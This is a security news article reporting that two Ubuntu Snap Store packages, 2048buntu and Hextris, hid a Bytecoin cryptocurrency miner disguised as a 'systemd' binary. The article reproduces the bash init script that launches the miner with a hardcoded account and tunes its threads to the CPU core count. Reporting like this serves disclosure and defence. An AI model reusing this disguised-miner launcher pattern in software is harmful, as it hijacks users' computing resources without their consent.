Tuesday, April 29, 2025
HomeCryptocurrency hackUbuntu Snap Store Apps Contains Hidden Cryptocurrency Miner Malware

Ubuntu Snap Store Apps Contains Hidden Cryptocurrency Miner Malware

Published on

SIEM as a Service

Follow Us on Google News

An Ubuntu user identified a malicious code that mines Bytecoin (BCN) hidden in the source code of the Ubuntu snap package (2048buntu and Hextris) on the official Ubuntu Snap Store.

The malicious app 2048buntu appears to be a carbon copy of the legitimate 2024 game that hosted on the Ubuntu Snap Store.

Both the packages “2048buntu and Hextris” that contain cryptocurrency codes added to the store by user Nicolas Tomb and the account hardcoded is myfirstferrari@protonmail.com.

- Advertisement - Google News

Also Read 8-year-old Critical Privilege Escalation Vulnerability Found in the Latest Linux Kernel Version

An Ubuntu user according to Github name “tarwirdur” identified the app contains a cryptocurrency miner hidden in “systemd” daemon and the affected app contains “init script” which allows the script to run in the background.

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
 /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
 /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

As like android play store, the Snap Store doesn’t provide a number of installations, so it is unclear on how many users affected with hidden cryptocurrency miner.

With Ubuntu store, anyone can create and host apps as like Chrome web store, iOS App Store, and Google Play Store.

Ubuntu Snap Store

According to omgubuntu “all the uploaded apps will undergo automatic testing to ensure compatibility across multiple distros and with current framework snaps are not checked line-by-line, so it is difficult to stop these miners being published on the Snap store.”

All the apps uploaded by user Nicolas Tomb was removed from the Ubuntu Snap Store and it’s pending further investigations. You can find the page in Google cache.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

RansomHub Ransomware Deploys Malware to Breach Corporate Networks

The eSentire’s Threat Response Unit (TRU) in early March 2025, a sophisticated cyberattack leveraging...

19 APT Hackers Target Asia-based Company Servers Using Exploited Vulnerabilities and Spear Phishing Email

The NSFOCUS Fuying Laboratory’s global threat hunting system identified 19 sophisticated Advanced Persistent Threat...

FBI Reports ₹1.38 Lakh Crore Loss in 2024, a 33% Surge from 2023

The FBI’s Internet Crime Complaint Center (IC3) has reported a record-breaking loss of $16.6...

Fog Ransomware Reveals Active Directory Exploitation Tools and Scripts

Cybersecurity researchers from The DFIR Report’s Threat Intel Group uncovered an open directory hosted...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

RansomHub Ransomware Deploys Malware to Breach Corporate Networks

The eSentire’s Threat Response Unit (TRU) in early March 2025, a sophisticated cyberattack leveraging...

Advanced Multi-Stage Carding Attack Hits Magento Site Using Fake GIFs and Reverse Proxy Malware

A multi-stage carding attack has been uncovered targeting a Magento eCommerce website running an...

Hannibal Stealer: Cracked Variant of Sharp and TX Malware Targets Browsers, Wallets, and FTP Clients

A new cyber threat, dubbed Hannibal Stealer, has surfaced as a rebranded and cracked...